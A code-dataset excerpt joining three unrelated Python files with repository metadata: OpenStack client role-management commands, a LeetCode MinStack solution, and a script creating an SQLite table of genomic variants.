metavar='<role-name>',
help='New role name')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = identity_client.roles.create(parsed_args.role_name)
info = {}
info.update(role._info)
return zip(*sorted(info.iteritems()))
class DeleteRole(command.Command):
"""Delete existing role"""
api = 'identity'
log = logging.getLogger(__name__ + '.DeleteRole')
def get_parser(self, prog_name):
parser = super(DeleteRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Name or ID of role to delete')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = utils.find_resource(identity_client.roles, parsed_args.role)
identity_client.roles.delete(role.id)
return
class ListRole(lister.Lister):
"""List roles"""
api = 'identity'
log = logging.getLogger(__name__ + '.ListRole')
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
columns = ('ID', 'Name')
data = self.app.client_manager.identity.roles.list()
return (columns,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class ListUserRole(lister.Lister):
"""List user-role assignments"""
api = 'identity'
log = logging.getLogger(__name__ + '.ListUserRole')
def get_parser(self, prog_name):
parser = super(ListUserRole, self).get_parser(prog_name)
parser.add_argument(
'user',
metavar='<user>',
nargs='?',
help='Name or ID of user to include')
parser.add_argument(
'--tenant',
metavar='<tenant>',
help='Name or ID of tenant to include')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
columns = ('ID', 'Name', 'Tenant ID', 'User ID')
identity_client = self.app.client_manager.identity
# user-only roles are not supported in KSL so we are
# required to have a user and tenant; default to the
# values used for authentication if not specified
if not parsed_args.tenant:
parsed_args.tenant = identity_client.auth_tenant_id
if not parsed_args.user:
parsed_args.user = identity_client.auth_user_id
tenant = utils.find_resource(identity_client.tenants,
parsed_args.tenant)
user = utils.find_resource(identity_client.users, parsed_args.user)
data = identity_client.roles.roles_for_user(user.id, tenant.id)
# Add the names to the output even though they will be constant
for role in data:
role.user_id = user.name
role.tenant_id = tenant.name
return (columns,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class RemoveRole(command.Command):
"""Remove role from tenant:user"""
api = 'identity'
log = logging.getLogger(__name__ + '.RemoveRole')
def get_parser(self, prog_name):
parser = super(RemoveRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role name or ID to remove from user')
parser.add_argument(
'--tenant',
metavar='<tenant>',
required=True,
help='Name or ID of tenant')
parser.add_argument(
'--user',
metavar='<user>',
required=True,
help='Name or ID of user')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = utils.find_resource(identity_client.roles, parsed_args.role)
tenant = utils.find_resource(identity_client.tenants,
parsed_args.tenant)
user = utils.find_resource(identity_client.users, parsed_args.user)
identity_client.roles.remove_user_role(
user.id,
role.id,
tenant.id)
class ShowRole(show.ShowOne):
"""Show single role"""
api = 'identity'
log = logging.getLogger(__name__ + '.ShowRole')
def get_parser(self, prog_name):
parser = super(ShowRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Name or ID of role to display')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = utils.find_resource(identity_client.roles, parsed_args.role)
info = {}
info.update(role._info)
return zip(*sorted(info.iteritems()))
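# Hypothetical command-line usage once these classes are registered as cliff
# entry points (command names are illustrative, not confirmed by this file):
#   openstack role create deployer
#   openstack role add deployer --tenant demo --user alice
#   openstack user role list alice --tenant demo
#   openstack role remove deployer --tenant demo --user alice
#   openstack role show deployer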
|
hughsaunders/python-openstackclient
|
openstackclient/identity/v2_0/role.py
|
Python
|
apache-2.0
| 7,727
|
class MinStack(object):
def __init__(self):
"""
initialize your data structure here.
"""
self.stack = []
def push(self, x):
"""
:type x: int
:rtype: void
"""
cur_min = self.getMin()
new_min = x if cur_min is None or x < cur_min else cur_min
self.stack.append((x, new_min))
def pop(self):
"""
:rtype: void
"""
if len(self.stack) == 0:
return
else:
self.stack.pop()
def top(self):
"""
:rtype: int
"""
if len(self.stack) == 0:
return None
else:
return self.stack[-1][0]
def getMin(self):
"""
:rtype: int
"""
if len(self.stack) == 0:
return None
else:
return self.stack[-1][1]
# Your MinStack object will be instantiated and called as such:
# obj = MinStack()
# obj.push(x)
# obj.pop()
# param_3 = obj.top()
# param_4 = obj.getMin()
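# A concrete trace (hypothetical values): each entry stores (value, running
# minimum), so getMin() is O(1) at the cost of one extra slot per element:
#   s = MinStack()
#   s.push(5); s.push(2); s.push(7)
#   s.getMin()  # -> 2
#   s.pop()     # removes 7
#   s.getMin()  # -> 2
#   s.pop()     # removes 2
#   s.getMin()  # -> 5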
|
scream7/leetcode
|
algorithms/python/155.py
|
Python
|
apache-2.0
| 1,066
|
import sqlite3
# the filename of this SQLite database
db_filename = "variants.db"
# initialize database connection
conn = sqlite3.connect(db_filename)
c = conn.cursor()
table_def = """\
CREATE TABLE variants(
id integer primary key,
chrom text,
start integer,
end integer,
strand text,
rsid text);
"""
c.execute(table_def)
conn.commit()
conn.close()
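# A follow-up sketch (hypothetical values) showing how the table would be
# populated and queried after creation; the ? placeholders parameterize the
# queries, which handles quoting and avoids SQL injection:
#
#   conn = sqlite3.connect(db_filename)
#   c = conn.cursor()
#   c.execute("INSERT INTO variants(chrom, start, end, strand, rsid) "
#             "VALUES (?, ?, ?, ?, ?)",
#             ("chr1", 10582, 10583, "+", "rs58108140"))
#   conn.commit()
#   for row in c.execute("SELECT * FROM variants WHERE chrom = ?", ("chr1",)):
#       print(row)
#   conn.close()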
|
jaehyuk/bds-files
|
chapter-13-out-of-memory/create_table.py
|
Python
|
mit
| 368
|